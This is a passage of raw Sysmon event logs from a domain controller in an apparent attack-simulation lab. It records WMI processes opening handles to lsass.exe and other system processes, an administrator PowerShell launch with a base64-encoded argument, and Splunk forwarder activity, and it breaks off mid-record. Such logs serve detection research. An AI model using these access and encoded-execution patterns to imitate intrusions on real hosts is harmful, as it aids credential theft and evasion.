16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6DB7-603E-C5AA-00000000AD01}22567320C:\Windows\system32\conhost.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240799Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240798Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6DB7-603E-C5AA-00000000AD01}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.123{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.122{05ADC7E1-6DB7-603E-C4AA-00000000AD01}15876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EA PABPAGIAagBzACAAVgBlAHIAcwBpAG8AbgA9ACIAMQAuADEALgAwAC4AMQAiACAAeABtAGwAbgBzAD0AIgBoAHQAdABwADoALwAvAHMAYwBoAGUAbQBhAHMALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8AcABvAHcAZQByAHMAaABlAGwAbAAvADIAMAAwADQALwAwADQAIgA+AA0ACgAgACAAPABPAGIAagAgAFIAZQBmAEkAZAA9ACIAMAAiAD4ADQAKACAAIAAgACAAPABUAE4AIABSAGUAZgBJAGQAPQAiADAAIgA+AA0ACgAgACAAIAAgACAAIAA8AFQAPgBTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEEAcgByAGEAeQBMAGkAcwB0ADwALwBUAD4ADQAKACAAIAAgACAAIAAgADwAVAA+AFMAeQBzAHQAZQBtAC4ATwBiAGoAZQBjAHQAPAAvAFQAPgANAAoAIAAgACAAIAA8AC8AVABOAD4ADQAKACAAIAAgACAAPABMAFMAVAA+AA0ACgAgACAAIAAgACAAIAA8AFMAPgBhAGQANwBhAGUAYQAwADYALQBhADcANgBhAC0ANABhADEAOQAtADgAZgBmADcALQA1ADQAZgA1AGYAMwBlADkAYwBjADIAMQA8AC8AUwA+AA0ACgAgACAAIAAgADwALwBMAFMAVAA+AA0ACgAgACAAPAAvAE8AYgBqAD4ADQAKADwALwBPAGIAagBzAD4A -C Write-Host $args[0]C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002240786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.107{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmp5998.tmpMD5=60A0AD7F7730CF82C4EA159654A6925D,SHA256=004BF43FA0070DF0D666534CFA22587151132EB87903DD210E27A25EBF136FB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:15.092{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\tmp5998.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:16.842{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F8F50DCF5A657DE8A67C63FB30088D2,SHA256=FE846A012D5DBF6A6CAC52C4722663BE284F65EA02D0F24FA82E52D28D603342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:16.092{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=43BAE24EDBD6C4B07680D3E3CDB88130,SHA256=F668D616FCFC57BF1CEF4C72A51BD6C71D6854445305E8F0E57EBCF6D8F40C10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:17.904{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B63898C17F336B7FD778F0A4F593757,SHA256=081CB7C9D0D1F9BA49EDFC650246A52EBDC6D067496F4EE78A3005D059C98E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:17.217{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15889C0DC095ECCEDF27DDEEE9BECECE,SHA256=5252505761FD54CFEB87DE0D3D030BAB5FF68E8B71094F66D0F2F8EBBAAEEEA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:18.951{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28C9A2938BC2D2426768EFDF5B8F7E3C,SHA256=5E139EE67B42E7678907B590ED97EBE6DC1DFB8F80A55611733076FA3FA97E10,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002240902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:07.335{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60149-false10.0.1.12-8000- 23542300x80000000000000002240904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:19.970{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EE73BC042EA8A51FC796BB400DA7556,SHA256=1AF615EDED108BD184F64BCAACB2A272F4458B7AB93E9B24026202919AA7DDC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002240905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:20.975{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 